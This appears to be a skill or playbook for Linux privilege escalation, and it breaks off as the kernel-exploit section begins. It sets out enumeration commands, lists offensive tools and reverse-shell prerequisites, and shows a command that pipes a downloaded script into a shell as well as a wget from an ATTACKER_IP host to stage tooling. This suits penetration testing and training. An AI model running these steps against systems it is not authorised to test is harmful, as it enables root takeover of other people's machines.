Linux Privilege Escalation

Linux Privilege Escalation

Purpose

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.

Inputs / Prerequisites

Required Access

• Low-privilege shell access to target Linux system
• Ability to execute commands (interactive or semi-interactive shell)
• Network access for reverse shell connections (if needed)
• Attacker machine for payload hosting and receiving shells

Technical Requirements

• Understanding of Linux filesystem permissions and ownership
• Familiarity with common Linux utilities and scripting
• Knowledge of kernel versions and associated vulnerabilities
• Basic understanding of compilation (gcc) for custom exploits

Recommended Tools

• LinPEAS, LinEnum, or Linux Smart Enumeration scripts
• Linux Exploit Suggester (LES)
• GTFOBins reference for binary exploitation
• John the Ripper or Hashcat for password cracking
• Netcat or similar for reverse shells

Outputs / Deliverables

Primary Outputs

• Root shell access on target system
• Privilege escalation path documentation
• System enumeration findings report
• Recommendations for remediation

Evidence Artifacts

• Screenshots of successful privilege escalation
• Command output logs demonstrating root access
• Identified vulnerability details
• Exploited configuration files

Core Workflow

Phase 1: System Enumeration

#### Basic System Information Gather fundamental system details for vulnerability research:

# Hostname and system role
hostname

# Kernel version and architecture
uname -a

# Detailed kernel information
cat /proc/version

# Operating system details
cat /etc/issue
cat /etc/*-release

# Architecture
arch

#### User and Permission Enumeration

# Current user context
whoami
id

# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false

# Users with home directories
cat /etc/passwd | grep home

# Group memberships
groups

# Other logged-in users
w
who

#### Network Information

# Network interfaces
ifconfig
ip addr

# Routing table
ip route

# Active connections
netstat -antup
ss -tulpn

# Listening services
netstat -l

#### Process and Service Enumeration

# All running processes
ps aux
ps -ef

# Process tree view
ps axjf

# Services running as root
ps aux | grep root

#### Environment Variables

# Full environment
env

# PATH variable (for hijacking)
echo $PATH

Phase 2: Automated Enumeration

Deploy automated scripts for comprehensive enumeration:

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh

Transfer scripts to target system:

# On attacker machine
python3 -m http.server 8000

# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Phase 3: Kernel Exploits

#### Identify Kernel Version

uname -r
cat /proc/version

#### Search for Exploits

# Use Linux Exploit Suggester
./linux-exploit-suggester.sh

# Manual search o

<!-- truncated -->